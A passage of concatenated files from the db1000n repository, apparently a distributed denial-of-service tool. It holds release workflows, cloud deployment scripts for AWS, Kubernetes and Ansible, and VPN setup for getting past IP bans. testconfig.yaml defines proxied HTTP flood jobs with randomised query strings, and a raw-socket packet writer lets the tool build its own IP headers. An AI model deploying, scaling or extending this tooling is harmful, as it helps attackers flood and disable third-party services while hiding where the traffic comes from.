22 | You can check logs for the application with the Heroku CLI: [https://devcenter.heroku.com/articles/logging#view-logs](https://devcenter.heroku.com/articles/logging#view-logs) 23 | 24 | ## Destroy 25 | 26 | To destroy: 27 | 28 | ```sh 29 | export EMAIL= 30 | export API_KEY= 31 | terraform destroy -var "email=${EMAIL}" -var "api_key=${API_KEY}" 32 | ``` 33 | -------------------------------------------------------------------------------- /ansible/aws/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | ## Prerequisites 4 | 5 | 1. Ansible 2.9 6 | 1. Collection amazon.aws (can be installed by command `ansible-galaxy collection install amazon.aws`) 7 | 1. Created key pair and public key stored in `AWS.pub` in the same folder as the `aws-provisioning.yaml` playbook 8 | 9 | Here you can read a manual on AWS account creation: [AWS manual](https://docs.google.com/document/d/e/2PACX-1vTeCirL7ANTcX9vKXniKTjKkxGEE9Ftd1xBc0bHKPoSrd2aj5fNeresltDUEp6ZYNgM3EZF5csNj_R4/pub) 10 | 11 | This playbook creates one Linux and one Windows EC2 instance from customized AMIs so the whole setup fits into Free Tier limits. This means it can run for free for 1 year from AWS account creation. 12 | 13 | The AMI has an OpenSSH server installed. The public key is copied to the server if it's created using the Ansible playbook provided. Otherwise it would have to be done manually after logging in to the server. 14 | 15 | The Administrator password is reset during startup and can be retrieved in a standard AWS way. 
16 | -------------------------------------------------------------------------------- /.github/workflows/goreleaser-action.yaml: -------------------------------------------------------------------------------- 1 | name: goreleaser 2 | 3 | on: 4 | push: 5 | tags: ["**"] 6 | 7 | jobs: 8 | goreleaser: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - name: Checkout 12 | uses: actions/checkout@v2 13 | with: 14 | fetch-depth: 0 15 | - name: Fetch all tags 16 | run: git fetch --force --tags 17 | - name: Set up Go 18 | uses: actions/setup-go@v2 19 | with: 20 | go-version: 1.18 21 | - name: Run GoReleaser 22 | uses: goreleaser/goreleaser-action@v2 23 | with: 24 | # either 'goreleaser' (default) or 'goreleaser-pro' 25 | distribution: goreleaser 26 | version: latest 27 | args: release --rm-dist 28 | env: 29 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 30 | PROTECTED_KEYS: ${{ secrets.PROTECTED_KEYS }} 31 | DEFAULT_CONFIG_VALUE: ${{ secrets.DEFAULT_CONFIG }} 32 | DEFAULT_CONFIG_PATH: ${{ secrets.DEFAULT_CONFIG_PATH }} 33 | -------------------------------------------------------------------------------- /.github/pull_request_template.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | Please include a summary of the change and which issue is fixed. Please also include relevant motivation and context. List any dependencies that are required for this change. 4 | 5 | Fixes # (issue) 6 | 7 | ## Type of change 8 | 9 | Please delete options that are not relevant. 10 | 11 | - [ ] Bug fix (non-breaking change which fixes an issue) 12 | - [ ] New feature (non-breaking change which adds functionality) 13 | - [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected) 14 | - [ ] Documentation update 15 | 16 | ## How Has This Been Tested? 17 | 18 | Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. 
Please also list any relevant details for your test configuration 19 | 20 | - [ ] Test A 21 | - [ ] Test B 22 | 23 | ## Test Configuration 24 | 25 | - Release version: 26 | - Platform: 27 | 28 | ## Logs 29 | 30 | ```text 31 | logs 32 | ``` 33 | 34 | ## Screenshots 35 | 36 | - [ ] No screenshot 37 | -------------------------------------------------------------------------------- /.github/workflows/ko-release.yaml: -------------------------------------------------------------------------------- 1 | # This workflow uses actions that are not certified by GitHub. 2 | # They are provided by a third-party and are governed by 3 | # separate terms of service, privacy policy, and support 4 | # documentation. 5 | 6 | name: Release with ko 7 | 8 | on: 9 | push: 10 | tags: ["**"] 11 | 12 | env: 13 | DOCKER_REPO: ghcr.io/${{ github.repository_owner }}/db1000n 14 | 15 | jobs: 16 | push_to_registry: 17 | name: Publish docker image with ko 18 | runs-on: ubuntu-latest 19 | steps: 20 | - uses: actions/setup-go@v2 21 | with: 22 | go-version: 1.18 23 | - uses: actions/checkout@v2 24 | - uses: imjasonh/setup-ko@v0.6 25 | - run: KO_DOCKER_REPO=${DOCKER_REPO,,} ko publish --bare --tags ${{ github.ref_name }},latest --platform all . 26 | env: 27 | VERSION: ${{ github.ref_name }} 28 | PROTECTED_KEYS: ${{ secrets.PROTECTED_KEYS }} 29 | DEFAULT_CONFIG_VALUE: ${{ secrets.DEFAULT_CONFIG }} 30 | DEFAULT_CONFIG_PATH: ${{ secrets.DEFAULT_CONFIG_PATH }} 31 | -------------------------------------------------------------------------------- /.github/workflows/ko-build.yaml: -------------------------------------------------------------------------------- 1 | # This workflow uses actions that are not certified by GitHub. 2 | # They are provided by a third-party and are governed by 3 | # separate terms of service, privacy policy, and support 4 | # documentation. 
5 | 6 | name: Build with ko 7 | 8 | on: 9 | push: 10 | branches: ["main"] 11 | tags: ["**"] 12 | 13 | env: 14 | DOCKER_REPO: ghcr.io/${{ github.repository_owner }}/db1000n-beta 15 | 16 | jobs: 17 | push_to_registry: 18 | name: Publish docker image with ko 19 | runs-on: ubuntu-latest 20 | steps: 21 | - uses: actions/setup-go@v2 22 | with: 23 | go-version: 1.18 24 | - uses: actions/checkout@v2 25 | - uses: imjasonh/setup-ko@v0.6 26 | - run: KO_DOCKER_REPO=${DOCKER_REPO,,} ko publish --bare --tags ${{ github.ref_name }},latest --platform all . 27 | env: 28 | VERSION: ${{ github.ref_name }}-beta 29 | PROTECTED_KEYS: ${{ secrets.PROTECTED_KEYS }} 30 | DEFAULT_CONFIG_VALUE: ${{ secrets.DEFAULT_CONFIG }} 31 | DEFAULT_CONFIG_PATH: ${{ secrets.DEFAULT_CONFIG_PATH }} 32 | -------------------------------------------------------------------------------- /testconfig.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: sequence 3 | args: 4 | jobs: 5 | - type: set-value 6 | name: proxylist 7 | args: 8 | value: '{{ join (get_url "https://raw.githubusercontent.com/Arriven/db1000n/main/proxylist.json" | from_string_array) "," }}' 9 | - type: log 10 | args: 11 | text: '{{ .Value (ctx_key "data.proxylist") }}' 12 | - type: http 13 | args: 14 | count: 1 15 | request: 16 | method: GET 17 | path: 'https://localhost:8080/search?searchid={{ index (.Value (ctx_key "config")) "args" "jobs" 0 "type" }}&l10n=ru&reqenc=&text={{ random_uuid }}' 18 | client: 19 | # timeout: 1s 20 | proxy_urls: '{{ .Value (ctx_key "data.proxylist") }}' 21 | - type: http 22 | args: 23 | request: 24 | method: GET 25 | path: "https://localhost:8090/search?searchid={{ random_uuid }}&l10n=ru&reqenc=&text={{ random_uuid }}" 26 | client: 27 | proxy_urls: '{{ .Value (ctx_key "data.proxylist") }}' 28 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-nodes/data.tf: 
-------------------------------------------------------------------------------- 1 | data "aws_iam_policy_document" "eks_worker_node_assume_role_policy" { 2 | statement { 3 | sid = "EKSWorkerAssumeRole" 4 | 5 | actions = ["sts:AssumeRole"] 6 | 7 | principals { 8 | type = "Service" 9 | identifiers = ["ec2.amazonaws.com"] 10 | } 11 | } 12 | } 13 | 14 | data "aws_iam_policy_document" "assume_role_policy" { 15 | statement { 16 | actions = ["sts:AssumeRole"] 17 | resources = ["*"] 18 | } 19 | } 20 | 21 | data "aws_ami" "amazon_eks_nodes" { 22 | most_recent = true 23 | owners = ["amazon"] 24 | 25 | filter { 26 | name = "name" 27 | values = ["amazon-eks-node-${var.cluster_version}-*"] 28 | } 29 | 30 | filter { 31 | name = "owner-alias" 32 | values = [ 33 | "amazon", 34 | ] 35 | } 36 | } 37 | 38 | data "template_file" "user_data" { 39 | template = file("${path.root}/scripts/node-user-data.sh") 40 | 41 | vars = { 42 | CLUSTER_NAME = var.cluster_name 43 | CLUSTER_ENDPOINT = var.cluster_endpoint 44 | CLUSTER_CA_DATA = var.cluster_ca_data 45 | } 46 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Bohdan Ivashko 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /golangci-lint.nix: -------------------------------------------------------------------------------- 1 | with import {}; 2 | 3 | buildGo118Module rec { 4 | pname = "golangci-lint"; 5 | version = "1.45.2"; 6 | 7 | src = fetchFromGitHub { 8 | owner = "golangci"; 9 | repo = "golangci-lint"; 10 | rev = "v${version}"; 11 | sha256 = "sha256-Mr45nJbpyzxo0ZPwx22JW2WrjyjI9FPpl+gZ7NIc6WQ="; 12 | }; 13 | 14 | vendorSha256 = "sha256-pcbKg1ePN8pObS9EzP3QYjtaty27L9sroKUs/qEPtJo="; 15 | 16 | doCheck = false; 17 | 18 | subPackages = [ "cmd/golangci-lint" ]; 19 | 20 | nativeBuildInputs = [ installShellFiles ]; 21 | 22 | ldflags = [ 23 | "-s" "-w" "-X main.version=${version}" "-X main.commit=v${version}" "-X main.date=19700101-00:00:00" 24 | ]; 25 | 26 | postInstall = '' 27 | for shell in bash zsh fish; do 28 | HOME=$TMPDIR $out/bin/golangci-lint completion $shell > golangci-lint.$shell 29 | installShellCompletion golangci-lint.$shell 30 | done 31 | ''; 32 | 33 | meta = with lib; { 34 | description = "Fast linters Runner for Go"; 35 | homepage = "https://golangci-lint.run/"; 36 | license = licenses.gpl3Plus; 37 | maintainers = with maintainers; [ anpryl manveru mic92 ]; 38 | }; 39 | } -------------------------------------------------------------------------------- /src/utils/ota/restart_windows.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // 
+build windows 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "os" 9 | "os/exec" 10 | "strings" 11 | "syscall" 12 | 13 | "go.uber.org/zap" 14 | ) 15 | 16 | func restart(logger *zap.Logger, extraArgs ...string) error { 17 | execPath, err := os.Executable() 18 | if err != nil { 19 | return fmt.Errorf("failed to locate the executable file: %w", err) 20 | } 21 | 22 | // A specific way the `cmd.exe` processes the `start` command: it takes the 23 | // first quoted substring as a process name! (https://superuser.com/a/1656458) 24 | cmdLine := fmt.Sprintf(`/C start "process" "%s"`, execPath) 25 | args := []string{} 26 | 27 | if len(extraArgs) != 0 { 28 | args = appendArgIfNotPresent(os.Args[1:], extraArgs) 29 | } else { 30 | args = os.Args[1:] 31 | } 32 | 33 | if len(args) > 0 { 34 | cmdLine += " " + strings.Join(args, " ") 35 | } 36 | 37 | cmd := exec.Command("cmd.exe") 38 | cmd.SysProcAttr = &syscall.SysProcAttr{CmdLine: cmdLine} 39 | 40 | if err := cmd.Start(); err != nil { 41 | return fmt.Errorf("failed to start the command: %w", err) 42 | } 43 | 44 | os.Exit(0) 45 | 46 | return nil 47 | } 48 | -------------------------------------------------------------------------------- /ansible/linux/README.md: -------------------------------------------------------------------------------- 1 | # Ansible playbook to setup plain VM 2 | 3 | Script will be useful if you have some plain VM and want to quickly setup it. Playbook tested on Ubuntu 20.04 4 | 5 | ## Requirements 6 | 7 | - [Ansible](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html) 8 | - Any VM with SSH access 9 | - OPTIONAL: Subscription on [expressvpn.com](https://www.expressvpn.com) (get the activation code) 10 | 11 | ## Init 12 | 13 | ```sh 14 | cp inventory.cfg.example inventory.cfg 15 | ``` 16 | 17 | Fill inventory.cfg with values. 
18 | Example with [ExpressVPN](https://www.expressvpn.com): 19 | 20 | ```sh 21 | [target] 22 | 11.22.33.44 ansible_connection=ssh ansible_ssh_user=user 23 | 24 | [target:vars] 25 | ansible_python_interpreter=/usr/bin/python3 26 | setup_vpn=True 27 | expressvpn_activation_code=JFJKAMV7171 28 | ``` 29 | 30 | Example without VPN(not recommended): 31 | 32 | ```sh 33 | [target] 34 | 11.22.33.44 ansible_connection=ssh ansible_ssh_user=user 35 | 36 | [target:vars] 37 | ansible_python_interpreter=/usr/bin/python3 38 | setup_vpn=False 39 | ``` 40 | 41 | ## Deploy 42 | 43 | ```sh 44 | ansible-playbook -i inventory.cfg setup.yaml 45 | ``` 46 | -------------------------------------------------------------------------------- /src/utils/ota/restart_darwin.go: -------------------------------------------------------------------------------- 1 | //go:build darwin 2 | // +build darwin 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "os" 9 | "syscall" 10 | 11 | "go.uber.org/zap" 12 | ) 13 | 14 | func restart(logger *zap.Logger, extraArgs ...string) error { 15 | executable, err := os.Executable() 16 | if err != nil { 17 | return fmt.Errorf("failed to resolve the path to the current executable: %w", err) 18 | } 19 | 20 | workingDirectory, err := os.Getwd() 21 | if err != nil { 22 | return fmt.Errorf("failed to resolve the current working directory: %w", err) 23 | } 24 | 25 | execSpec := &syscall.ProcAttr{ 26 | Dir: workingDirectory, 27 | Env: os.Environ(), 28 | Files: []uintptr{ 29 | os.Stdin.Fd(), 30 | os.Stdout.Fd(), 31 | os.Stderr.Fd(), 32 | }, 33 | } 34 | 35 | var args []string 36 | 37 | if len(extraArgs) != 0 { 38 | args = appendArgIfNotPresent(os.Args[1:], extraArgs) 39 | } else { 40 | args = os.Args[1:] 41 | } 42 | 43 | fork, err := syscall.ForkExec(executable, args, execSpec) 44 | if err != nil { 45 | return fmt.Errorf("failed to spawn a new process: %w", err) 46 | } 47 | 48 | logger.Info("new process has been started successfully", 49 | zap.Int("old_pid", os.Getpid()), 
zap.Int("new_pid", fork)) 50 | 51 | os.Exit(0) 52 | 53 | return nil 54 | } 55 | -------------------------------------------------------------------------------- /src/utils/ota/restart_linux.go: -------------------------------------------------------------------------------- 1 | //go:build linux 2 | // +build linux 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "os" 9 | "syscall" 10 | 11 | "go.uber.org/zap" 12 | ) 13 | 14 | func restart(logger *zap.Logger, extraArgs ...string) error { 15 | executable, err := os.Executable() 16 | if err != nil { 17 | return fmt.Errorf("failed to resolve the path to the current executable: %w", err) 18 | } 19 | 20 | workingDirectory, err := os.Getwd() 21 | if err != nil { 22 | return fmt.Errorf("failed to resolve the current working directory: %w", err) 23 | } 24 | 25 | execSpec := &syscall.ProcAttr{ 26 | Dir: workingDirectory, 27 | Env: os.Environ(), 28 | Files: []uintptr{ 29 | os.Stdin.Fd(), 30 | os.Stdout.Fd(), 31 | os.Stderr.Fd(), 32 | }, 33 | } 34 | 35 | var args []string 36 | 37 | if len(extraArgs) != 0 { 38 | args = appendArgIfNotPresent(os.Args[1:], extraArgs) 39 | } else { 40 | args = os.Args[1:] 41 | } 42 | 43 | fork, err := syscall.ForkExec(executable, args, execSpec) 44 | if err != nil { 45 | return fmt.Errorf("failed to spawn a new process: %w", err) 46 | } 47 | 48 | logger.Info("new process has been started successfully", 49 | zap.Int("old_pid", os.Getpid()), zap.Int("new_pid", fork)) 50 | 51 | os.Exit(0) 52 | 53 | return nil 54 | } 55 | -------------------------------------------------------------------------------- /terraform/aws_eks/variables.tf: -------------------------------------------------------------------------------- 1 | # common 2 | variable "region" { 3 | description = "AWS region" 4 | default = "us-east-1" 5 | } 6 | 7 | variable "profile" { 8 | description = "AWS profile" 9 | default = "default" 10 | } 11 | 12 | variable "project" { 13 | description = "A list of projects to deploy" 14 | default = 
"db1000n" 15 | } 16 | 17 | # ssh key 18 | variable "key_name" { 19 | description = "SSH key name" 20 | default = "db1000n" 21 | } 22 | 23 | variable "public_key" { 24 | description = "SSH public key" 25 | } 26 | 27 | # eks 28 | variable "eks_node_instance_type" { 29 | description = "EC2 instance type for EKS nodes" 30 | default = "t3.medium" 31 | } 32 | 33 | variable "eks_node_desired_capacity" { 34 | description = "The number of Amazon EC2 instances that should be running in the auto scale group" 35 | default = "3" 36 | } 37 | 38 | variable "eks_node_max_size" { 39 | description = "The maximum size of the auto scale group" 40 | default = "4" 41 | } 42 | 43 | variable "eks_node_min_size" { 44 | description = "The minimum size of the auto scale group" 45 | default = "2" 46 | } 47 | 48 | variable "tags" { 49 | description = "A map of tags to add to VPC" 50 | type = map(string) 51 | default = {} 52 | } -------------------------------------------------------------------------------- /docs/advanced-docs/docker-vpn.md: -------------------------------------------------------------------------------- 1 | # Docker VPN 2 | 3 | ## Setting up VPN for Docker users 4 | 5 | In case of using a dedicated VPS that has banned public IP, a container with OpenVPN client can be deployed inside the same network as db1000n is in. 6 | One of the easy ways to set it up is through the docker-compose. 7 | 8 | There are few `docker-compose` examples, see `examples/docker`. Documentation you can find below: 9 | 10 | ### Static Docker Compose 11 | 12 | `openvpn/auth.txt`: 13 | 14 | ```text 15 | 16 | 17 | ``` 18 | 19 | Also place your `*.ovpn` file into `openvpn/` directory. You can set multiple configuration files and one of them will be used. 
20 | 21 | ### Old Docker Compose 22 | 23 | `openvpn/provider01.txt`: 24 | 25 | ```text 26 | 27 | 28 | ``` 29 | 30 | `openvpn/provider02.txt`: 31 | 32 | ```text 33 | 34 | 35 | ``` 36 | 37 | Also place your `provider01.endpoint01.conf`, `provider01.endpoint02.conf` and `provider02.endpoint01.conf` files into `openvpn/` directory. 38 | 39 | ## Start 40 | 41 | ```sh 42 | docker-compose -f examples/docker/your_docker_file.yml up -d 43 | ``` 44 | 45 | ## Stop 46 | 47 | ```sh 48 | docker-compose -f examples/docker/your_docker_file.yml down 49 | ``` 50 | -------------------------------------------------------------------------------- /src/utils/backoff.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "context" 5 | "time" 6 | ) 7 | 8 | func Sleep(ctx context.Context, t time.Duration) bool { 9 | select { 10 | case <-time.After(t): 11 | return true 12 | case <-ctx.Done(): 13 | return false 14 | } 15 | } 16 | 17 | type BackoffConfig struct { 18 | Multiplier int 19 | Limit int 20 | Timeout time.Duration 21 | } 22 | 23 | func DefaultBackoffConfig() BackoffConfig { 24 | const ( 25 | defaultMultiplier = 10 26 | defaultLimit = 6 27 | ) 28 | 29 | return BackoffConfig{Multiplier: defaultMultiplier, Limit: defaultLimit, Timeout: time.Microsecond} 30 | } 31 | 32 | type BackoffController struct { 33 | BackoffConfig 34 | count int 35 | } 36 | 37 | func (c BackoffController) GetTimeout() time.Duration { 38 | result := c.Timeout 39 | for i := 0; i < c.count; i++ { 40 | result *= time.Duration(c.Multiplier) 41 | } 42 | 43 | return result 44 | } 45 | 46 | func (c *BackoffController) Increment() *BackoffController { 47 | if c.count < c.Limit { 48 | c.count++ 49 | } 50 | 51 | // return pointer to itself for usability 52 | return c 53 | } 54 | 55 | func (c *BackoffController) Reset() { 56 | c.count = 0 57 | } 58 | 59 | type Counter struct { 60 | Count int 61 | 62 | iter int 63 | } 64 | 65 | func (c *Counter) Next() bool 
{ 66 | if c.Count <= 0 { 67 | return true 68 | } 69 | 70 | c.iter++ 71 | 72 | return c.iter <= c.Count 73 | } 74 | -------------------------------------------------------------------------------- /src/utils/metrics/serve.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "net/http" 7 | "time" 8 | 9 | "github.com/prometheus/client_golang/prometheus" 10 | "github.com/prometheus/client_golang/prometheus/promhttp" 11 | "go.uber.org/zap" 12 | ) 13 | 14 | func serveMetrics(ctx context.Context, logger *zap.Logger, listen string) { 15 | // We don't expect that rendering metrics should take a lot of time and needs long timeout 16 | const timeout = 30 * time.Second 17 | 18 | mux := http.NewServeMux() 19 | mux.Handle("/metrics", promhttp.HandlerFor( 20 | prometheus.DefaultGatherer, 21 | promhttp.HandlerOpts{ 22 | // Opt into OpenMetrics to support exemplars. 23 | EnableOpenMetrics: true, 24 | Timeout: timeout, 25 | }, 26 | )) 27 | 28 | server := &http.Server{ 29 | Addr: listen, 30 | Handler: mux, 31 | ReadTimeout: time.Second, 32 | ReadHeaderTimeout: time.Second, 33 | } 34 | go func(ctx context.Context, server *http.Server) { 35 | <-ctx.Done() 36 | 37 | if err := server.Shutdown(ctx); err != nil && !errors.Is(err, 38 | http.ErrServerClosed) && !errors.Is(err, context.Canceled) { 39 | logger.Warn("failed to shut down prometheus server", zap.Error(err)) 40 | } 41 | }(ctx, server) 42 | 43 | err := server.ListenAndServe() 44 | if err != nil && !errors.Is(err, http.ErrServerClosed) { 45 | logger.Warn("failed to start prometheus server", zap.Error(err)) 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /src/core/packetgen/raw_conn_unix.go: -------------------------------------------------------------------------------- 1 | //go:build !windows 2 | // +build !windows 3 | 4 | package packetgen 5 | 6 | import ( 7 | "fmt" 8 | "syscall" 9 
| 10 | "github.com/google/gopacket" 11 | ) 12 | 13 | type rawConn struct { 14 | fd int 15 | buf gopacket.SerializeBuffer 16 | } 17 | 18 | // openRawConn opens a raw ip network connection based on the provided config 19 | // use ipv6 as it also supports ipv4 20 | func openRawConn() (*rawConn, error) { 21 | fd, err := syscall.Socket(syscall.AF_INET, syscall.SOCK_RAW, syscall.IPPROTO_RAW) 22 | if err != nil { 23 | return nil, err 24 | } 25 | 26 | err = syscall.SetsockoptInt(fd, syscall.IPPROTO_IP, syscall.IP_HDRINCL, 1) 27 | if err != nil { 28 | return nil, err 29 | } 30 | 31 | return &rawConn{ 32 | fd: fd, 33 | buf: gopacket.NewSerializeBuffer(), 34 | }, nil 35 | } 36 | 37 | func (conn *rawConn) Write(packet Packet) (n int, err error) { 38 | if err := packet.Serialize(conn.buf); err != nil { 39 | return 0, fmt.Errorf("error serializing packet: %w", err) 40 | } 41 | 42 | addr := &syscall.SockaddrInet4{} 43 | 44 | // ipv6 is not supported for now 45 | copy(addr.Addr[:], packet.IP().To4()) 46 | 47 | return 0, syscall.Sendto(conn.fd, conn.buf.Bytes(), 0, addr) 48 | } 49 | 50 | func (conn *rawConn) Close() error { 51 | return syscall.Close(conn.fd) 52 | } 53 | 54 | func (conn *rawConn) Target() string { return "raw://" } 55 | 56 | func (conn *rawConn) Read(_ []byte) (int, error) { return 0, nil } 57 | -------------------------------------------------------------------------------- /kubernetes/manifests/README.md: -------------------------------------------------------------------------------- 1 | # Kubernetes manifests to install 2 | 3 | ## If you use Helm, see our [Helm Chart](/db1000n/advanced-docs/kubernetes/helm-charts/) 4 | 5 | There are two ways to deploy it with plain manifests: 6 | 7 | - using Deployment 8 | - using DaemonSet 9 | 10 | ## Deployment 11 | 12 | Install: 13 | 14 | ```bash 15 | cd kubernetes/manifests/ 16 | kubectl apply -f deployment.yaml 17 | kubectl get po -n db1000n 18 | ``` 19 | 20 | Scale: 21 | 22 | ```bash 23 | kubectl scale deployment/db1000n 
--replicas=10 -n db1000n 24 | ``` 25 | 26 | Destroy: 27 | 28 | ```bash 29 | kubectl delete deploy db1000n -n db1000n 30 | ``` 31 | 32 | ## DaemonSet 33 | 34 | Get and label nodes where you need to run `db1000n`. 35 | There should be nodes at least with 2CPU and 2GB of RAM, CPU resources in priority for `db1000n`: 36 | 37 | ```bash 38 | kubectl get nodes 39 | ``` 40 | 41 | Select nodes where you want to run `db1000n` from the output and label them: 42 | 43 | ```bash 44 | kubectl label nodes db1000n=true 45 | ``` 46 | 47 | Install the DaemonSet: 48 | 49 | ```bash 50 | kubectl apply -f daemonset.yaml 51 | ``` 52 | 53 | Destroy: 54 | 55 | ```bash 56 | kubectl delete daemonset db1000n -n db1000n 57 | ``` 58 | 59 | ???+ info "How it works?" 60 | 61 | DaemonSet will create one `db1000n` pod on each node that is labeled as `db1000n=true`. 62 | It could be useful in large clusters that can be autoscaled horizontally, for example, a GKE standard k8s cluster within the free tier limits. 63 | -------------------------------------------------------------------------------- /.goreleaser.yaml: -------------------------------------------------------------------------------- 1 | project_name: db1000n 2 | builds: 3 | - id: db1000n 4 | env: 5 | - CGO_ENABLED=0 6 | dir: . 7 | main: . 
8 | goos: 9 | - linux 10 | - windows 11 | - darwin 12 | - freebsd 13 | - netbsd 14 | - openbsd 15 | - dragonfly 16 | - aix 17 | - illumos 18 | - solaris 19 | goarch: 20 | - amd64 21 | - arm64 22 | - arm 23 | - "386" 24 | - "mips" 25 | - "mips64" 26 | - "mips64le" 27 | - "mipsle" 28 | - "riscv64" 29 | - "s390x" 30 | gomips: 31 | - hardfloat 32 | - softfloat 33 | flags: 34 | - -tags=encrypted 35 | goarm: 36 | - "5" 37 | - "6" 38 | - "7" 39 | ldflags: 40 | - -s -w 41 | - -extldflags "-static" 42 | - -X github.com/Arriven/db1000n/src/utils/ota.Version={{ .Version }} 43 | - -X github.com/Arriven/db1000n/src/utils.ProtectedKeys={{ .Env.PROTECTED_KEYS }} 44 | - -X github.com/Arriven/db1000n/src/job/config.DefaultConfig={{ .Env.DEFAULT_CONFIG_VALUE }} 45 | - -X github.com/Arriven/db1000n/src/job.DefaultConfigPathCSV={{ .Env.DEFAULT_CONFIG_PATH }} 46 | archives: 47 | - id: default 48 | name_template: '{{ .ProjectName }}_{{ .Os }}_{{ .Arch }}{{ with .Arm }}v{{ . }}{{ end }}{{ with .Mips }}_{{ . }}{{ end }}{{ if not (eq .Amd64 "v1") }}{{ .Amd64 }}{{ end }}' 49 | builds: 50 | - db1000n 51 | format: tar.gz 52 | format_overrides: 53 | - goos: windows 54 | format: zip 55 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/data.tf: -------------------------------------------------------------------------------- 1 | data "tls_certificate" "cert" { 2 | url = aws_eks_cluster.eks_cluster.identity[0].oidc[0].issuer 3 | } 4 | 5 | data "aws_iam_policy_document" "eks_cluster_assume_role_policy" { 6 | statement { 7 | actions = ["sts:AssumeRole"] 8 | 9 | principals { 10 | type = "Service" 11 | identifiers = ["eks.amazonaws.com"] 12 | } 13 | } 14 | } 15 | 16 | # Cluster autoscaler 17 | data "aws_iam_policy_document" "assume_role_policy_web_identity" { 18 | statement { 19 | actions = ["sts:AssumeRoleWithWebIdentity"] 20 | 21 | principals { 22 | type = "Federated" 23 | identifiers = 
["${aws_iam_openid_connect_provider.oidc_provider.id}"] 24 | } 25 | 26 | condition { 27 | test = "StringEquals" 28 | variable = "${replace(aws_iam_openid_connect_provider.oidc_provider.url, "https://", "")}:sub" 29 | values = ["system:serviceaccount:kube-system:aws-node", "system:serviceaccount:kube-system:cluster-autoscaler"] 30 | } 31 | } 32 | } 33 | 34 | data "aws_iam_policy_document" "eks_cluster_autoscaler_policy" { 35 | statement { 36 | resources = ["*"] 37 | actions = [ 38 | "autoscaling:DescribeAutoScalingGroups", 39 | "autoscaling:DescribeAutoScalingInstances", 40 | "autoscaling:DescribeLaunchConfigurations", 41 | "autoscaling:DescribeTags", 42 | "autoscaling:SetDesiredCapacity", 43 | "autoscaling:TerminateInstanceInAutoScalingGroup", 44 | "ec2:DescribeLaunchTemplateVersions" 45 | ] 46 | } 47 | } -------------------------------------------------------------------------------- /src/utils/ota/shared_test.go: -------------------------------------------------------------------------------- 1 | package ota 2 | 3 | import ( 4 | "strings" 5 | "testing" 6 | ) 7 | 8 | func TestMergeExtraArgs(t *testing.T) { 9 | t.Parallel() 10 | 11 | type testCase struct { 12 | Name string 13 | OSArgs []string 14 | ExtraArgs []string 15 | ExpectedArgs []string 16 | } 17 | 18 | testCases := []testCase{ 19 | { 20 | Name: "no extra args", 21 | OSArgs: []string{"--pprof=:8080"}, 22 | ExpectedArgs: []string{"--pprof=:8080"}, 23 | }, 24 | { 25 | Name: "unique extra args", 26 | OSArgs: []string{"--pprof=:8080"}, 27 | ExtraArgs: []string{"--enable-self-update", "--make-yourself-comfortable"}, 28 | ExpectedArgs: []string{"--pprof=:8080", "--enable-self-update", "--make-yourself-comfortable"}, 29 | }, 30 | { 31 | Name: "overlapping extra args", 32 | OSArgs: []string{"--pprof=:8080"}, 33 | ExpectedArgs: []string{"--pprof=:8080", "--enable-self-update", "--make-yourself-comfortable"}, 34 | ExtraArgs: []string{"--pprof=:8080", "--enable-self-update", "--make-yourself-comfortable"}, 35 | }, 36 | 
} 37 | 38 | for i := range testCases { 39 | tc := testCases[i] 40 | 41 | t.Run(tc.Name, func(tt *testing.T) { 42 | tt.Parallel() 43 | 44 | mergedArgs := appendArgIfNotPresent(tc.OSArgs, tc.ExtraArgs) 45 | 46 | gotRawArgs := strings.Join(mergedArgs, " ") 47 | expectedRawArgs := strings.Join(tc.ExpectedArgs, " ") 48 | 49 | if gotRawArgs != expectedRawArgs { 50 | t.Errorf("Unexpected merge results:\nexp: %s\ngot: %s", 51 | expectedRawArgs, gotRawArgs) 52 | } 53 | }) 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /src/utils/metrics/accumulator.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | // Accumulator for statistical metrics for use in a single job. Requires Flush()-ing to Reporter. 4 | // Not concurrency-safe. 5 | type Accumulator struct { 6 | jobID string 7 | stats [NumStats]map[string]uint64 // Array of metrics by Stat. Each metric is a map of uint64 values by target. 8 | metrics *Metrics 9 | } 10 | 11 | type dimensions struct { 12 | jobID string 13 | target string 14 | } 15 | 16 | // Add n to the Accumulator Stat value. Returns self for 